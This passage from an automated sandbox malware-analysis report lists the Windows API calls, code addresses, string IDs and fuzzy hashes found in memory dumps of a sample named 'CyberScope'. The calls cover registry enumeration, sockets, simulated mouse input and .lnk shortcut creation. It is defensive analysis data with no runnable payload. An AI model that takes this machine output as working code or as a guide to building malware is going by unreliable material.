                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 4072794657-3128320259
                                                                                    • Opcode ID: 17579118bba1672953b2a5cfedbedb90ce5d0a9f6ab136d40f655f5787fa9139
                                                                                    • Instruction ID: fbe82047d16545f5d88f233f0ebe1e2ab807d61df669e62c7e6498107d043ff3
                                                                                    • Opcode Fuzzy Hash: 17579118bba1672953b2a5cfedbedb90ce5d0a9f6ab136d40f655f5787fa9139
                                                                                    • Instruction Fuzzy Hash: C80162F29002087FE7219BE4AD8DEFA776CEB08301F404591B70AE6051EA749E854B75
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00201322
                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00201334
                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00201342
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00201350
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020135F
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0020136F
                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00201376
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 8dd2615cdc459954c1eeb578aac039b96612829b0c0886d5770270fb58072680
                                                                                    • Instruction ID: c1d6b0ef0932f937e7d439d936312a46cd3bbfc070970158a527afdb79a5c25e
                                                                                    • Opcode Fuzzy Hash: 8dd2615cdc459954c1eeb578aac039b96612829b0c0886d5770270fb58072680
                                                                                    • Instruction Fuzzy Hash: 21F0C936042612FBD7615F94EE4DBD6BB39BF04302F402161F101918A187749872CF90
                                                                                    APIs
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0021281D
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0021283E
                                                                                    • WSAGetLastError.WSOCK32 ref: 0021284F
                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00212938
                                                                                    • inet_ntoa.WSOCK32(?), ref: 002128E9
                                                                                      • Part of subcall function 001F433E: _strlen.LIBCMT ref: 001F4348
                                                                                      • Part of subcall function 00213C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0020F669), ref: 00213C9D
                                                                                    • _strlen.LIBCMT ref: 00212992
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3203458085-0
                                                                                    • Opcode ID: 0896d5eddd688faaf18cbdfa3bf46b4babf39ce7a6b771bdedb4ac5c61a8fec5
                                                                                    • Instruction ID: c3b9d9cbd270f0ec4fe269a13637c7fb4e0dcfe66d71408b82b9455fa7e86f89
                                                                                    • Opcode Fuzzy Hash: 0896d5eddd688faaf18cbdfa3bf46b4babf39ce7a6b771bdedb4ac5c61a8fec5
                                                                                    • Instruction Fuzzy Hash: F8B1F035204301EFD724DF24C885E6ABBE5AFA4318F54854CF4964B2E2DB31ED9ACB91
                                                                                    APIs
                                                                                    • __allrem.LIBCMT ref: 001C042A
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C0446
                                                                                    • __allrem.LIBCMT ref: 001C045D
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C047B
                                                                                    • __allrem.LIBCMT ref: 001C0492
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C04B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 1992179935-0
                                                                                    • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                    • Instruction ID: 5052f5276ee1f4cfb492882e0062437de4583f16fd964dff3556bd17d72b7575
                                                                                    • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                    • Instruction Fuzzy Hash: 2181E771A00746EFE726AE69CC82F6B73A9AF78724F24412EF511D7681E770DD008794
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001B8649,001B8649,?,?,?,001C67C2,00000001,00000001,8BE85006), ref: 001C65CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001C67C2,00000001,00000001,8BE85006,?,?,?), ref: 001C6651
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001C674B
                                                                                    • __freea.LIBCMT ref: 001C6758
                                                                                      • Part of subcall function 001C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3BC5
                                                                                    • __freea.LIBCMT ref: 001C6761
                                                                                    • __freea.LIBCMT ref: 001C6786
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: eac5ed75d707c0f41a035ce1fece4a35959cf19f702c3504ccfc1f595a231b1c
                                                                                    • Instruction ID: e6fbe9f6b4628602776a31cee3057c9daa25d56095bd93f122fa0546517d38cf
                                                                                    • Opcode Fuzzy Hash: eac5ed75d707c0f41a035ce1fece4a35959cf19f702c3504ccfc1f595a231b1c
                                                                                    • Instruction Fuzzy Hash: 7E51EFB2600316AFEB258F64CC85FBF77AAEB64754F254A6DFC18D6140EB34DC5086A0
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 0021D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0021C10E,?,?), ref: 0021D415
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D451
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4C8
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4FE
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0021C72A
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0021C785
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021C7CA
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0021C7F9
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0021C853
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0021C85F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 1120388591-0
                                                                                    • Opcode ID: 02f8d514bcc3cc1c5dea800b08fcd3648ebd3acff5ef4e7d142ea22509fe9bf6
                                                                                    • Instruction ID: 07fc25187e8631c76fd82b157ca020b5198c8fcda1436bf3354e211864c13bed
                                                                                    • Opcode Fuzzy Hash: 02f8d514bcc3cc1c5dea800b08fcd3648ebd3acff5ef4e7d142ea22509fe9bf6
                                                                                    • Instruction Fuzzy Hash: EA81AD34218241AFD715DF64C8C4E6ABBE9FF94308F14849CF0598B2A2CB71ED56CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000035), ref: 001F00A9
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001F0150
                                                                                    • VariantCopy.OLEAUT32(001F0354,00000000), ref: 001F0179
                                                                                    • VariantClear.OLEAUT32(001F0354), ref: 001F019D
                                                                                    • VariantCopy.OLEAUT32(001F0354,00000000), ref: 001F01A1
                                                                                    • VariantClear.OLEAUT32(?), ref: 001F01AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                    • String ID:
                                                                                    • API String ID: 3859894641-0
                                                                                    • Opcode ID: 476245cf748b85d60d4541fb574579e6148cb6200b1f7dbdfb86169832eed17d
                                                                                    • Instruction ID: 072af93fb8db4aef0f15d7b2de7e52a564aadeee03f9baed0cabe905463506eb
                                                                                    • Opcode Fuzzy Hash: 476245cf748b85d60d4541fb574579e6148cb6200b1f7dbdfb86169832eed17d
                                                                                    • Instruction Fuzzy Hash: B5511C35600318EADF25AF649889B39B3A5EF5D310F209447FA06DF297DB709C40DBA1
                                                                                    APIs
                                                                                      • Part of subcall function 001941EA: _wcslen.LIBCMT ref: 001941EF
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00209F2A
                                                                                    • _wcslen.LIBCMT ref: 00209F4B
                                                                                    • _wcslen.LIBCMT ref: 00209F72
                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00209FCA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                    • String ID: X
                                                                                    • API String ID: 83654149-3081909835
                                                                                    • Opcode ID: 9e3902eefd40b3484953ba2a8675183a0ad56745456ce917f05c635b4281cb10
                                                                                    • Instruction ID: ac16315a0dd6e9213a45341ab80f6148d6cfc9a215a7319888e9c29f9d2a1997
                                                                                    • Opcode Fuzzy Hash: 9e3902eefd40b3484953ba2a8675183a0ad56745456ce917f05c635b4281cb10
                                                                                    • Instruction Fuzzy Hash: D4E1B3315183019FDB24EF24C885B6AB7E5BF95314F04896DF88A8B2A3DB31DD45CB92
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00206F21
                                                                                    • CoInitialize.OLE32(00000000), ref: 0020707E
                                                                                    • CoCreateInstance.OLE32(00230CC4,00000000,00000001,00230B34,?), ref: 00207095
                                                                                    • CoUninitialize.OLE32 ref: 00207319
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 886957087-24824748
                                                                                    • Opcode ID: 18ef7606b5dd7e02e7c208d63e8800481fe436d676304b4287c20e973766fb04
                                                                                    • Instruction ID: f7cb29c30adf16b15d974a67061676600b430cf87af7db8ea04ea852bd5555d3
                                                                                    • Opcode Fuzzy Hash: 18ef7606b5dd7e02e7c208d63e8800481fe436d676304b4287c20e973766fb04
                                                                                    • Instruction Fuzzy Hash: 6ED14971518301AFD700EF64C881A6BB7E9FF99708F40495DF5858B2A2DB71ED05CB92
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001EFBEF,00000000,?,?,00000000,?,001D39E2,00000004,00000000,00000000), ref: 00228CA7
                                                                                    • EnableWindow.USER32(?,00000000), ref: 00228CCD
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00228D2C
                                                                                    • ShowWindow.USER32(?,00000004), ref: 00228D40
                                                                                    • EnableWindow.USER32(?,00000001), ref: 00228D66
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00228D8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: a2d55fd4f23f9dcfab52caadb04f9cd48516e89ce68849f81e9c8028bbf2df14
                                                                                    • Instruction ID: ad2487f68a4ba36b40dce523e7d3f6b1467275b7e8b1f63f5d29956480083428
                                                                                    • Opcode Fuzzy Hash: a2d55fd4f23f9dcfab52caadb04f9cd48516e89ce68849f81e9c8028bbf2df14
                                                                                    • Instruction Fuzzy Hash: 84419630603665BFD729DFA4F889BA17BF1FB45304F284065E5085B1A2CB71D86ACB50
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00212D45
                                                                                      • Part of subcall function 0020EF33: GetWindowRect.USER32(?,?), ref: 0020EF4B
                                                                                    • GetDesktopWindow.USER32 ref: 00212D6F
                                                                                    • GetWindowRect.USER32(00000000), ref: 00212D76
                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00212DB2
                                                                                    • GetCursorPos.USER32(?), ref: 00212DDE
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00212E3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2387181109-0
                                                                                    • Opcode ID: f597e26ed42d4632eb3522980c855cb641474c34523e4a556fd5bb3c6794ece3
                                                                                    • Instruction ID: 98fb116e71462a08b5021ee915f44873187c04197735f1066998a3a58032c4a9
                                                                                    • Opcode Fuzzy Hash: f597e26ed42d4632eb3522980c855cb641474c34523e4a556fd5bb3c6794ece3
                                                                                    • Instruction Fuzzy Hash: E7310F7250531AAFD720DF54E848BAAB7E9FF94314F000929F88597181CB70E9698B92
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 001F55F9
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001F5616
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001F564E
                                                                                    • _wcslen.LIBCMT ref: 001F566C
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001F5674
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001F567E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 72514467-0
                                                                                    • Opcode ID: 0c6f5523e74e2dce41f13798788f30bc746c93689e650a966f269c11cd483f0e
                                                                                    • Instruction ID: 474e54ebcc5d10fb22b6b432bac87f5519b6fb8f2479a2f88534650dc1e4e087
                                                                                    • Opcode Fuzzy Hash: 0c6f5523e74e2dce41f13798788f30bc746c93689e650a966f269c11cd483f0e
                                                                                    • Instruction Fuzzy Hash: 842138722046087BEB2A5B79EC49EBB7BADDF48760F148029FB05CA091EF74DD419660
                                                                                    APIs
                                                                                      • Part of subcall function 00195851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001955D1,?,?,001D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00195871
                                                                                    • _wcslen.LIBCMT ref: 002062C0
                                                                                    • CoInitialize.OLE32(00000000), ref: 002063DA
                                                                                    • CoCreateInstance.OLE32(00230CC4,00000000,00000001,00230B34,?), ref: 002063F3
                                                                                    • CoUninitialize.OLE32 ref: 00206411
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 3172280962-24824748
                                                                                    • Opcode ID: f350b8daa50a9eaffef1ef0fcc4bf21921a222ea15b2e744d1b92bc58d168545
                                                                                    • Instruction ID: bb06656eddbb0ed2b68ca3b3ee7c80b338e4dea1a870805fb6eef31e3b35e8f1
                                                                                    • Opcode Fuzzy Hash: f350b8daa50a9eaffef1ef0fcc4bf21921a222ea15b2e744d1b92bc58d168545
                                                                                    • Instruction Fuzzy Hash: E2D14471A143019FCB14DF14C49892ABBE5FF89714F14889DF8859B3A2CB31EC55CB92
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,001B36E9,001B3355), ref: 001B3700
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B370E
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B3727
                                                                                    • SetLastError.KERNEL32(00000000,?,001B36E9,001B3355), ref: 001B3779
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 3e722da9f50825fb6e2b1e538526ee96c9ae09ab77c832b206daafd862913b0d
                                                                                    • Instruction ID: bebd8072e3a306b5bc8ed622986909f07bdd8df2245100f068c8ff9d16811710
                                                                                    • Opcode Fuzzy Hash: 3e722da9f50825fb6e2b1e538526ee96c9ae09ab77c832b206daafd862913b0d
                                                                                    • Instruction Fuzzy Hash: 9901D4B261A3217EA73527B4FCCA6F73A94EB257767300229F131850F1EF618D625544
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,001C2908,00259B48,0000000C,001B3268,00000001,?,?), ref: 001C30EB
                                                                                    • _free.LIBCMT ref: 001C311E
                                                                                    • _free.LIBCMT ref: 001C3146
                                                                                    • SetLastError.KERNEL32(00000000), ref: 001C3153
                                                                                    • SetLastError.KERNEL32(00000000), ref: 001C315F
                                                                                    • _abort.LIBCMT ref: 001C3165
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: 354148ff5fa1939ffa476fa396f219c3ebcf45915485da713abce538300250f0
                                                                                    • Instruction ID: d2700e229625558309edf0548a3e94ee11d1ba3e3ba5b94f037eeeaf68eb1845
